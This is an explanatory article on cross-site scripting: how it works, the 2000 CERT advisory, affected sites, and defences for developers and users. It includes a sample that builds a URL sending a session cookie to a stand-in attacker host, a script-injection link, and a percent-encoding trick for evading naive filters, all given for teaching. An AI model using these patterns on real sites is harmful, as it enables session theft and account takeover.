How to defeat the new No. 1 security threat: cross-site scripting

Cross-site scripting, often abbreviated XSS, is a class of Web security issues. A recent research report stated that XSS is now the top security risk.

In a typical XSS scenario, a Web page might use JavaScript to dynamically generate some document content based on a field in a Uniform Resource Identifier (URI). In the normal course of events, the site itself would generate legitimate information for that field.

If, however, the script that generated the new content did not filter the URI, it would be possible for an attacker to feed the page a custom-designed URI that ran a script of the attacker's choosing. The script could do almost anything, and the user would never know they weren't seeing legitimate content unless the hijacker was blatant.
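To make the pattern concrete, here is a minimal sketch of the vulnerable idiom. The function name and greeting page are hypothetical, not from any real site; the point is the unfiltered concatenation of URI data into generated HTML.

```javascript
// Hypothetical dynamic page: greets the user by a name taken straight
// from a URI query parameter -- the classic XSS mistake.
function renderGreeting(nameFromUri) {
  // UNSAFE: the parameter is concatenated into the page unfiltered.
  return "<p>Welcome back, " + nameFromUri + "!</p>";
}

// In the normal course of events, the site supplies a legitimate value:
console.log(renderGreeting("Alice"));
// → <p>Welcome back, Alice!</p>

// An attacker-crafted URI instead smuggles in running script:
console.log(renderGreeting("<script>/* attacker code */</script>"));
// → <p>Welcome back, <script>/* attacker code */</script>!</p>
```

The browser cannot tell the difference: both strings arrive as part of a page served by the trusted site.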

This is potentially very bad, since it is one way to enable phishing. For example, suppose a Web page with a cross-site scripting vulnerability belonged to a bank. An attacker aware of the vulnerability could forge e-mails purporting to be from the bank, with URIs that indeed led to the bank's site but contained some malicious script that wouldn't be obvious to a casual observer. Once a user clicked the link in the e-mail and logged into the bank site, the injected script could transmit the session cookie that authenticates the user to the attacker, who could then take over the user's account for as long as the session remained active.
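The mechanics of that cookie theft are simple. The sketch below uses a hypothetical attacker domain and function name; in the attack itself, the injected script would pass `document.cookie`, which it can read because it runs inside the bank page's own origin.

```javascript
// Sketch of what an injected payload does with the victim's session
// cookie (attacker.example and the function name are illustrative).
function buildExfiltrationUrl(cookieString) {
  // Smuggle the cookie out as a query parameter on an image request,
  // which the browser issues silently with no user-visible effect.
  return "http://attacker.example/steal?c=" + encodeURIComponent(cookieString);
}

console.log(buildExfiltrationUrl("SESSIONID=abc123"));
// → http://attacker.example/steal?c=SESSIONID%3Dabc123

// In the attack itself, running inside the bank's page:
//   new Image().src = buildExfiltrationUrl(document.cookie);
```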

This is considerably worse than an attack that takes users to a forged Web page, because it can, in principle, bypass most forms of authentication protection. After all, it's using the bank's own authentication system, and then hijacking the results. David Flanagan, author of JavaScript: The Definitive Guide, says cross-site scripting "enables a pernicious vulnerability whose roots go deep into the architecture of the Web."

Some history

Cross-site scripting first received wide notice in February 2000, when CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests was published. The original summary was:

"A Web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a Web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user."

The systems affected were listed as "Web browsers" and "Web servers that dynamically generate pages based on unvalidated input."

One XSS example given in the original CERT advisory is this link:

<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT>malicious code</SCRIPT>">Click here</A>

Looking back at this example from the perspective of six years of dealing with XSS and malicious spammers, it seems a bit naïve. After all, only a user who didn't bother to look at the link destination could be tricked into clicking on such a link. The presence of the tag "<SCRIPT>" would be enough to tip off a sophisticated user, as would the presence of other HTML, such as a "<FORM>" tag, that could be perverted to run scripts.

However, even a sophisticated user might be fooled if the script tag and malicious code were encoded. Attackers use tricks like encoding angle brackets as %3C, constructing unreadable numeric IP addresses, using alternate character sets and so on. The safest policy for a user is, of course, never to click on links from untrusted sources.
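This is also why naive server-side filtering fails: a filter that scans the raw URI for "<SCRIPT>" never sees it, because the attacker sent the percent-encoded form, and the tag only reappears when the parameter is decoded. A small sketch (the parameter value is illustrative):

```javascript
// An attacker sends the payload percent-encoded in the URI:
var rawParam = "%3Cscript%3Ealert(1)%3C%2Fscript%3E";

// A naive filter inspecting the raw parameter finds nothing suspicious:
console.log(rawParam.indexOf("<script>"));
// → -1 (no literal angle brackets present)

// But the server or browser decodes the parameter before using it,
// and the script tag reappears intact:
var decoded = decodeURIComponent(rawParam);
console.log(decoded);
// → <script>alert(1)</script>
```

The lesson for developers is to decode input first and filter afterward, or better, to validate against a whitelist as described below.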

The original CERT advisory went on to explain the impact of cross-site scripting. It was, and is, chilling stuff. XSS creates the potential for attackers to force malicious actions on trusted servers, even on SSL-encrypted servers. Even using a browser that lacks scripting support is not a foolproof solution, because attackers can still "alter the appearance of a page, modify its behavior or otherwise interfere with normal operation."

It isn't even necessarily over after the first attack. Once malicious code has been executed, the attacker can place a modified or "poisoned" cookie on the victim's computer that compromises every future visit to the affected site. In even more dangerous exploits, the attacker can modify the victim's browser security policies, allowing the attacker to elevate his privilege on the victim's machine, potentially doing more serious damage or gaining access to valuable local information, such as additional stored passwords.

Sites that have had XSS vulnerabilities

You'd think that cross-site scripting would be restricted to sites designed and administered by the unsophisticated, and that once you got beyond mom-and-pop e-commerce sites, you'd be free of the problem. You'd be wrong; even very sophisticated, security-conscious sites have had XSS vulnerabilities.

As I have found by regular reading of security sites like the SANS Institute's Internet Storm Center, their Top 20 Most Critical Internet Security Vulnerabilities page, Microsoft's security home page, and Brian Krebs' Washington Post security blog (see for example, the entry Cross-Site Scripting Flaws Abound), cross-site scripting vulnerabilities have affected most browsers, many content management systems and many high-profile sites.

It's bad enough to find XSS vulnerabilities on eBay or Amazon, which are constant targets of spammers and crackers. But would you believe an XSS vulnerability on the National Security Agency's site, www.nsa.gov? On Verisign.com, one of the root certificate authorities for the Web? Visa.com? JPMorganChase.com? Nyse.com? Amex.com? They happened.

How Web sites can avoid XSS vulnerabilities

The original CERT advisory offered this advice to Web developers, as true today as it was in 2000: "Web Page Developers Should Recode Dynamically Generated Pages to Validate Output." The article goes on to explain that it isn't enough just to filter out "<", "&" and ">" characters: CERT encourages developers to "restrict variables used in the construction of pages to those characters that are explicitly allowed and to check those variables during the generation of the output page. In addition, Web pages should explicitly set a character set to an appropriate value in all dynamically generated pages."
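A minimal sketch of that advice in JavaScript might look like the following. The function names are mine, not CERT's, and the whitelist shown is deliberately narrow; a real application would tailor the allowed character set to each field.

```javascript
// Escape-by-default: encode the characters that let data break out of
// its context and become markup.
function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Whitelist validation: accept only explicitly allowed characters,
// rather than trying to enumerate every dangerous one.
function isAllowed(value) {
  return /^[A-Za-z0-9 .,_-]*$/.test(value);
}

console.log(escapeHtml('<script>alert("xss")</script>'));
// → &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
console.log(isAllowed("Jane Doe"));  // → true
console.log(isAllowed("<script>"));  // → false
```

Note that the whitelist check rejects bad input outright, while escaping renders it harmless when it must be displayed; CERT's point is that relying on escaping a few known-bad characters alone is not enough.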

In support of this, because it's such a complicated subject, CERT provides a document full of guidelines for malicious code mitigation, with sample filtering code in C++, JavaScript and Perl, plus sample HTML for setting the character set.

CERT also advised Web server administrators to apply a patch from their vendor. The singular "a patch" seems wildly funny in hindsight: I have lost track of the many patches to XSS vulnerabilities that have been issued over the years to every Web server and operating system. To paraphrase Jefferson, the price of site security is constant vigilance.

How consumers can repel XSS attacks

The original CERT advisory said that users should either disable scripting in their browser, or, if unwilling to do that, "Not Engage in Promiscuous Browsing." That, too, sounds wildly funny in hindsight, but the additional information given at the time still holds. The emphases are mine:

"Since the most significant variations of this vulnerability involve cross-site scripting (the insertion of tags into another site's Web page), users can gain some protection by being selective about how they initially visit a Web site. Typing addresses directly into the browser (or using securely stored local bookmarks) is likely to be the safest way of connecting to a site.

"Users should be aware that even links to unimportant sites may expose other local systems on the network if the client's system resides behind a firewall, or if the client has cached credentials to access other Web servers (e.g., for an intranet). For this reason, cautious Web browsing is not a comparable substitute for disabling scripting.

"With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker's Web site may use a script to misrepresent the links in the user's window. For example, the contents of the Goto and Status bars in Netscape are controllable by JavaScript."

In the intervening years, several products have attempted to help protect users from XSS attacks. I have tried and discarded half a dozen antiphishing toolbars. So far, every one I have tried had more false positives than true warnings. Krebs recommends the Netcraft Anti-Phishing Toolbar, which is available free for Internet Explorer and Firefox. It appears to be useful, but I have no idea whether it will turn out to be any better than the toolbars I have already dumped.

Krebs also recommends the NoScript extension for Firefox. According to the download site, this tool "allows JavaScript, Java and other executable content only for trusted domains of your choice, e.g., your home banking Web site." In principle, a white list approach to scripting should give you fairly good protection against unknown threats, but if your trusted home banking Web site is compromised by a cross-site scripting attack after you've white listed it, all bets are off.

Judicious use of security zones can achieve much the same results. If you set your browser's security policy to turn on scripting only for trusted sites, and truly screen your trusted sites, you can accomplish most of what the NoScript extension for Firefox gives you, even on Internet Explorer.

Ultimately, the best approach to any security threat is defense in depth. By all means, turn off scripting for unknown sites. And run a toolbar that warns you about phishing. At the same time, try to type in site addresses yourself rather than indiscriminately clicking on links sent to you in e-mails, even if they come from well-meaning friends.

Martin Heller develops software and Web sites, and writes from Andover, Mass. Reach Martin at cw@mheller.com.
